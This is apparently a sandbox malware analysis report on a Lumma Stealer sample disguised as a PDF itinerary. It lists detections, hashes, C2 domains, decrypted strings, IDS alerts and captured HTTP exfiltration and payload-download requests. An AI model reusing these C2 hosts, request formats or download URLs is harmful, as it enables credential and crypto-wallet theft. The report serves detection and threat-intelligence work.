Windows Analysis Report
Navan - Itinerary.pdf.scr.exe

Overview

General Information

Sample name: Navan - Itinerary.pdf.scr.exe
Analysis ID: 1579293
MD5: 168e0d79aa66efd4c83cb8a745d6157a
SHA1: 3be1e99c2d2ed7eaa72fb5ab2697d70dff14cc94
SHA256: d0a926c2882477f35996cdcc93869aa28687421d892108786e9b67033583357e
Tags: exeuser-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Found malware configuration
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "sustainskelet.lat", "energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "rapeflowwj.lat", "crosshuaht.lat", "stem-mellows.cyou", "discokeyus.lat"], "Build id": "OPCN2M--Sergei"}
Multi AV Scanner detection for submitted file
Source: Navan - Itinerary.pdf.scr.exe Virustotal: Detection: 11% Perma Link
Source: Navan - Itinerary.pdf.scr.exe ReversingLabs: Detection: 13%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Sample uses string decryption to hide its real strings
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: stem-mellows.cyou
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String decryptor: OPCN2M--Sergei
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00415799 CryptUnprotectData, 13_2_00415799
Uses 32bit PE files
Source: Navan - Itinerary.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: Navan - Itinerary.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh] 13_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [esi], al 13_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] 13_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, eax 13_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [ebp+00h], ax 13_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h] 13_2_0043C767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea edx, dword ptr [ecx+01h] 13_2_0040B70C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov esi, eax 13_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, eax 13_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp eax 13_2_0042984F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov edx, ecx 13_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh 13_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh 13_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then test eax, eax 13_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] 13_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h] 13_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [ecx], bp 13_2_0041D83A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then push C0BFD6CCh 13_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then push C0BFD6CCh 13_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 13_2_0042B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov eax, dword ptr [esp+00000080h] 13_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h 13_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebx, eax 13_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [ecx], dx 13_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, dword ptr [ebp-20h] 13_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebx, eax 13_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebp, eax 13_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebx, esi 13_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [ebx], cx 13_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 13_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [edi], cl 13_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh] 13_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh] 13_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then push esi 13_2_00427AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [edi], cl 13_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [ebx], ax 13_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then push ebx 13_2_0043CA93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [eax], cx 13_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [esi], cx 13_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [eax], cx 13_2_00428B61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [edi], cl 13_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [edi], cl 13_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 13_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebx, eax 13_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebx, eax 13_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] 13_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h 13_2_0041D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp al, 2Eh 13_2_00426B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 13_2_00435450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] 13_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then push 00000000h 13_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [ecx], dx 13_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, dword ptr [ebp-20h] 13_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 13_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 13_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h 13_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp eax 13_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h] 13_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp dword ptr [0044450Ch] 13_2_00418591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov eax, dword ptr [ebp-68h] 13_2_00428D93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then xor edi, edi 13_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov eax, dword ptr [0044473Ch] 13_2_0041C653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov edx, ebp 13_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp dword ptr [004455F4h] 13_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, eax 13_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then xor byte ptr [esp+eax+17h], al 13_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [edi], bl 13_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 13_2_0042A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [esi], al 13_2_0041BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h] 13_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h] 13_2_0041E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx eax, word ptr [edx] 13_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [edi], dx 13_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [esi], cx 13_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, ebx 13_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp ecx 13_2_0040BFFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] 13_2_0043EFB0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.7:60934 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.7:49217 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49727 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49756 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49750 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49745 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49768 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49784 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49762 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49727 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49727 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49750 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49768 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49784 -> 172.67.197.170:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: stem-mellows.cyou
Source: Malware configuration extractor URLs: discokeyus.lat
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View IP Address: 172.67.197.170 172.67.197.170
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49727 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49750 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49756 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49745 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49768 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49784 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49762 -> 172.67.197.170:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P5TANLSLXSMI1PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12821Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I52PEKALHBLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15035Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4YG2T3MJRWG9I737Y3OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IOSLEP4CTXEMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1235Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VOVVNMP8HPSWYUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 425349Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: discokeyus.lat
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf HTTP/1.1User-Agent: csHost: raw.githubusercontent.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: stem-mellows.cyou
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: x1.i.lencr.org
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
Source: 77EC63BDA74BD0D0E0426DC8F8008506.10.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D.10.dr String found in binary or memory: http://x1.i.lencr.org/
Source: RegSvcs.exe, 0000000D.00000002.1636367348.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1636492005.0000000001233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/
Source: RegSvcs.exe, 0000000D.00000002.1636297807.000000000119C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1636509588.0000000001242000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/api
Source: RegSvcs.exe, 0000000D.00000002.1636367348.00000000011D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/p
Source: RegSvcs.exe, 0000000D.00000002.1636492005.0000000001233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/yv
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C63000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/4
